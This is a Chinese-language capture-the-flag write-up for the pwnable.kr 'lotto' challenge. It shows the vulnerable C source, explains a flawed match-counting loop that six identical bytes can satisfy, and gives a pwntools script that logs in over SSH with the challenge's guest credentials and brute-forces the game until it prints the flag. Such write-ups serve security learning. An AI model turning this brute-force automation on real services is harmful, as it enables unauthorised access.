又回到了熟悉得ssh连接的题目,看题目描述是一个大乐透游戏:

连上去查看文件,玩一下,顺便把lotto.c源码下载到本地:

游戏玩法大致如下,每次输入六个ascii值小于46的字符,去匹配,都匹配到即可中一等奖拿到flag:

lotto.c源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
 
unsigned char submit[6];
 
void play(){
 
    int i;
    printf("Submit your 6 lotto bytes : ");
    fflush(stdout);
 
    int r;
    r = read(0, submit, 6);
 
    printf("Lotto Start!\n");
    //sleep(1);
 
    // generate lotto numbers
    int fd = open("/dev/urandom", O_RDONLY);
    if(fd==-1){
        printf("error. tell admin\n");
        exit(-1);
    }
    unsigned char lotto[6];
    if(read(fd, lotto, 6) != 6){
        printf("error2. tell admin\n");
        exit(-1);
    }
    for(i=0; i<6; i++){
        lotto[i] = (lotto[i] % 45) + 1;        // 1 ~ 45
    }
    close(fd);
 
    // calculate lotto score
    int match = 0, j = 0;
    for(i=0; i<6; i++){
        for(j=0; j<6; j++){
            if(lotto[i] == submit[j]){
                match++;
            }
        }
    }
 
    // win!
    if(match == 6){
        system("/bin/cat flag");
    }
    else{
        printf("bad luck...\n");
    }
 
}
 
void help(){
    printf("- nLotto Rule -\n");
    printf("nlotto is consisted with 6 random natural numbers less than 46\n");
    printf("your goal is to match lotto numbers as many as you can\n");
    printf("if you win lottery for *1st place*, you will get reward\n");
    printf("for more details, follow the link below\n");
    printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
    printf("mathematical chance to win this game is known to be 1/8145060.\n");
}
 
int main(int argc, char* argv[]){
 
    // menu
    unsigned int menu;
 
    while(1){
 
        printf("- Select Menu -\n");
        printf("1. Play Lotto\n");
        printf("2. Help\n");
        printf("3. Exit\n");
 
        scanf("%d", &menu);
 
        switch(menu){
            case 1:
                play();
                break;
            case 2:
                help();
                break;
            case 3:
                printf("bye\n");
                return 0;
            default:
                printf("invalid menu\n");
                break;
        }
    }
    return 0;
}

分析:

​ 最开始看到随机数以及文件描述符,以为重点在这块,结果通读了一波程序,发现问题很简单,主要是下面对于值判断有利用的地方,这里两个for只要随机字符有一个和我们输入的字符都匹配那就可以完成条件,所以输入6个相同字符来暴力碰撞就可,反正提示可以尝试很多次。

​ 这里用pwntools来写个自动化脚本,然后自动碰撞即可拿到flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *

if __name__=="__main__":
	shell=ssh(host="pwnable.kr",user="lotto",port=2222,password="guest")
	p=shell.process("./lotto",)
	lottoBytes=chr(5)+chr(5)+chr(5)+chr(5)+chr(5)+chr(5)
	while True:
		data=p.recv(1024)
		print data
		if("bad luck" in data or "Select Menu" in data):
			p.sendline("1")
		else:
			break
		data=p.recv(1024)
		print data
		if("Submit your 6 lotto bytes" in data):
			p.sendline(lottoBytes)
	p.interactive()